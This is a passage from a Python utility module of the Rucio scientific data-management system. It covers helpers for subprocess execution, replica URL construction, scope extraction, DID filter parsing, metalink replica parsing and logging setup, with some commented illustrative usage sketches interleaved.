return json.loads(data, object_hook=datetime_parser)
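# --- Illustrative round trip (added sketch, not part of the original module) ---
# render_json() serialises datetimes via APIEncoder into the module's
# RFC-1123 DATE_FORMAT; parse_response() converts them back through
# datetime_parser, assuming DATE_FORMAT carries the ' UTC' suffix.
def _example_json_roundtrip():
    payload = render_json(name='rule', created_at=datetime.datetime.utcnow())
    decoded = parse_response(payload)
    return decoded  # 'created_at' is a datetime again (sub-second precision lost)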
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(list_, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(list_), n):
yield list_[i:i + n]
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
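# --- Illustrative usage (added sketch, not part of the original module) ---
# chunks() slices a list, dict_chunks() slices a dict; both keep the last,
# possibly shorter, remainder group.
def _example_chunking():
    assert list(chunks(list(range(7)), 3)) == [[0, 1, 2], [3, 4, 5], [6]]
    parts = list(dict_chunks({'a': 1, 'b': 2, 'c': 3}, 2))
    assert [len(p) for p in parts] == [2, 1]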
def my_key_generator(namespace, fn, **kw):
"""
    Customized key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
    elif nfields == 2:
        # only two fields exist here, so use fields[1] (fields[2] would raise IndexError)
        return '/%s/%s/%s/%s/%s' % (fields[0], fields[1], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def _register_policy_package_surl_algorithms():
def try_importing_policy(vo=None):
import importlib
try:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo['vo']))
module = importlib.import_module(package)
if hasattr(module, 'get_surl_algorithms'):
surl_algorithms = module.get_surl_algorithms()
if not vo:
_SURL_ALGORITHMS.update(surl_algorithms)
else:
# check that the names are correctly prefixed
for k in surl_algorithms.keys():
if k.lower().startswith(vo['vo'].lower()):
_SURL_ALGORITHMS[k] = surl_algorithms[k]
else:
raise InvalidAlgorithmName(k, vo['vo'])
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
from rucio.core.vo import list_vos
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy()
else:
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(vo)
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
_register_policy_package_surl_algorithms()
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
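# --- Illustrative dispatch (added sketch, not part of the original module) ---
# Unknown convention names fall back to the 'DQ2' default. Calling this
# requires a Rucio configuration, since policy packages are registered
# lazily on first use; the DSN below is hypothetical.
def _example_construct_surl():
    # DQ2 with a two-field DSN yields '/<project>/<stripped dsn>/<filename>'
    return construct_surl('project.dataset', 'f.root', naming_convention='no-such-algo')
    # -> '/project/project.dataset/f.root'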
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if surl.startswith('https://storage.googleapis.com'):
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
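# --- Illustrative cleaning (added sketch, not part of the original module) ---
# SRM ports and web-service query prefixes are stripped so that equivalent
# replicas compare equal. The endpoint below is hypothetical.
def _example_clean_surls():
    surls = ['srm://se.example.org:8446/srm/managerv2?SFN=/pnfs/path/file']
    return clean_surls(surls)  # -> ['srm://se.example.org/pnfs/path/file']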
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=None):
    if name is None:
        name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
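# --- Illustrative extraction (added sketch, not part of the original module) ---
# The ATLAS convention takes the scope from an explicit 'scope:name' pair,
# or from the leading DSN fields (two fields for user/group datasets).
def _example_extract_scope():
    assert extract_scope_atlas('mc16:file.root', scopes=[]) == ('mc16', 'file.root')
    assert extract_scope_atlas('user.jdoe.data.001', scopes=[]) == ('user.jdoe', 'user.jdoe.data.001')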
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
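# --- Illustrative formatting (added sketch, not part of the original module) ---
# sizefmt() uses decimal (SI) units, not binary ones.
def _example_sizefmt():
    assert sizefmt(1234) == '1.234 kB'
    assert sizefmt(1234, human=False) == '1234'
    assert sizefmt(None) == '0.0 B'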
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
    Normally the client IP will be set on the server side (request.remote_addr).
    Here the IP is the one seen by the host itself; connecting a UDP socket
    to the Google DNS address does not actually send any traffic.
    Try to determine the site name automatically from common environment variables,
    in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist,
    use the fixed string 'ROAMING'.
    If the RUCIO_LATITUDE/RUCIO_LONGITUDE environment variables are set, they define the location.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
    :param trace_endpoint: the endpoint where the trace should be sent
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
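# --- Illustrative usage (added sketch, not part of the original module) ---
# Existing query parameters are preserved and merged with the new ones.
def _example_add_url_query():
    url = add_url_query('https://example.com/path?a=1', {'b': '2'})
    return url  # -> 'https://example.com/path?a=1&b=2'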
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
    :param input_string: String containing a value and a unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
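# --- Illustrative parsing (added sketch, not part of the original module) ---
# Units are decimal; unparseable input yields False rather than raising.
def _example_get_bytes_value():
    assert get_bytes_value_from_string('2kb') == 2000
    assert get_bytes_value_from_string('10GB') == 10000000000
    assert get_bytes_value_from_string('lots') is False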
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
                elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
                    try:
                        value = int(value)
                    except ValueError:
                        raise ValueError('Length has to be an integer value.')
                    filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
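# --- Illustrative parsing (added sketch, not part of the original module) ---
# Length comparisons become suffixed keys; 'type' is returned separately.
def _example_parse_did_filter():
    filters, type_ = parse_did_filter_from_string('length>=3,type=dataset')
    assert filters == {'length.gte': 3}
    assert type_ == 'dataset'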
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
                        raise DIDFilterSyntaxError("{} operator not understood.".format(operator))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
                        raise DIDFilterSyntaxError("{} or {} operator not understood.".format(operator1, operator2))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
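# --- Illustrative parsing (added sketch, not part of the original module) ---
# ';' separates OR groups, ',' separates AND terms, and compound
# inequalities are unfolded into two suffixed criteria.
def _example_parse_did_filter_fe():
    filters, _ = parse_did_filter_from_string_fe('1 < length <= 5; type = DATASET', name='*')
    assert filters == [{'length.gt': '1', 'length.lte': '5', 'name': '*'},
                       {'type': 'DATASET', 'name': '*'}]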
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
        except ElementTree.ParseError as xml_err:
            try:
                fp.seek(0)  # rewind after the failed XML parse before attempting JSON
                return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
    """
    Get a thread where a function runs periodically.
    :param interval: Interval in seconds when the action function should run.
    :param action: Function, that should run periodically.
    :param graceful_stop: Threading event used to check for graceful stop.
    """
    def start():
        while not graceful_stop.is_set():
            starttime = time.time()
            action()
            # never pass a negative value to sleep if the action overran the interval
            time.sleep(max(0, interval - (time.time() - starttime)))
    t = threading.Thread(target=start)
    return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
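# --- Illustrative mapping (added sketch, not part of the original module) ---
# The mode string encodes a direction plus whether limits apply across
# all activities at once; unknown modes yield (None, None).
def _example_throttler_mode():
    assert get_parsed_throttler_mode('DEST_PER_ACT') == ('destination', False)
    assert get_parsed_throttler_mode('SRC_PER_ALL_ACT') == ('source', True)
    assert get_parsed_throttler_mode('bogus') == (None, None)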
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
